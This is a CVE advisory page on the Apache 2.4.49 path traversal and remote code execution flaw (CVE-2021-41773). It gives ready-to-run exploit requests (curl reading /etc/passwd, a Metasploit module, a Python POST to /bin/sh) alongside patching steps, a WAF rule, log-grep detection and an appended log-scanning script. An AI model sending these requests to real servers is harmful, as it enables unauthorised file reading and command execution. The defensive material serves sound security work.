How CVE-2021-41773 Works
A flaw in Apache HTTP Server 2.4.49 allows path traversal through URL-encoded directory traversal sequences. The vulnerability arises from improper input validation in the `ap_normalize_path()` function, which fails to block malicious paths like `/icons/.%%32%65`. This lets attackers bypass security checks and access restricted files. If `mod_cgi` is enabled, remote code execution (RCE) becomes possible: crafted requests allow attackers to execute arbitrary commands on the server.
DailyCVE Form
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploitation:
1. Manual Exploit (curl):
curl -v "http://target.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
2. Metasploit Module:
use auxiliary/scanner/http/apache_normalize_path
set RHOSTS target.com
run
3. Python Exploit:
import requests
url = "http://target.com/cgi-bin/.%252e/.%252e/.%252e/.%252e/bin/sh"
data = {"cmd": "id"}
requests.post(url, data=data)
Mitigation:
1. Patch Immediately:
sudo apt update && sudo apt install --only-upgrade apache2
2. Disable `mod_cgi` if unused:
Comment out the line that loads the module:
# LoadModule cgi_module modules/mod_cgi.so
3. WAF Rules (ModSecurity):
SecRule REQUEST_URI "@contains %2e" "deny,log,id:1001"
4. Restrict Directory Access:
# Deny the filesystem root by default; grant access only to the directories that are served.
<Directory />
    Require all denied
</Directory>
5. Log Monitoring (Detect Attacks):
grep -Ei '%2e|\.\.' /var/log/apache2/access.log
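A decoding-aware version of the log check above, as an added example that is not part of the original page: it percent-decodes each logged request path repeatedly and flags requests where a `..` segment appears only after decoding. The log lines are constructed samples in Apache's common log format, and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: client, method, raw path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def decode_fully(path, max_rounds=5):
    """Percent-decode repeatedly so nested encodings such as %252e or
    %%32%65 collapse to the character they finally represent."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def has_encoded_traversal(raw_path):
    """True if decoding reveals more '..' segments than the raw path shows,
    i.e. some dots were hidden from a check that ran before decoding."""
    path = raw_path.split("?", 1)[0]
    decoded = decode_fully(path)
    return decoded.split("/").count("..") > path.split("/").count("..")

def scan(lines):
    """Return (client, method, path, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and has_encoded_traversal(m.group(3)):
            hits.append((m.group(1), m.group(2), m.group(3), int(m.group(4))))
    return hits

# Constructed sample log lines (documentation IPs; paths reuse the page's strings).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/Oct/2021:10:00:02 +0000] "GET /files/notes..old%20copy.txt HTTP/1.1" 200 90',
    '203.0.113.7 - - [05/Oct/2021:10:00:03 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.7 - - [05/Oct/2021:10:00:04 +0000] "POST /cgi-bin/.%252e/.%252e/.%252e/.%252e/bin/sh HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for client, method, path, status in scan(SAMPLE_LOG):
        # A 2xx status means the server answered the request: triage these first.
        print(f"{client} {method} {path} -> {status}")
```

Unlike the plain grep, the benign file name containing `..` in the second sample line is not flagged, because the check compares whole path segments.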
Impact Analysis:
- CVSS Score: 9.8 (Critical)
- Attack Vector: Network-based, no auth required.
- Affected Configs: Default installs with `mod_cgi` enabled.
References:
Sources:
Reported By: www.cve.org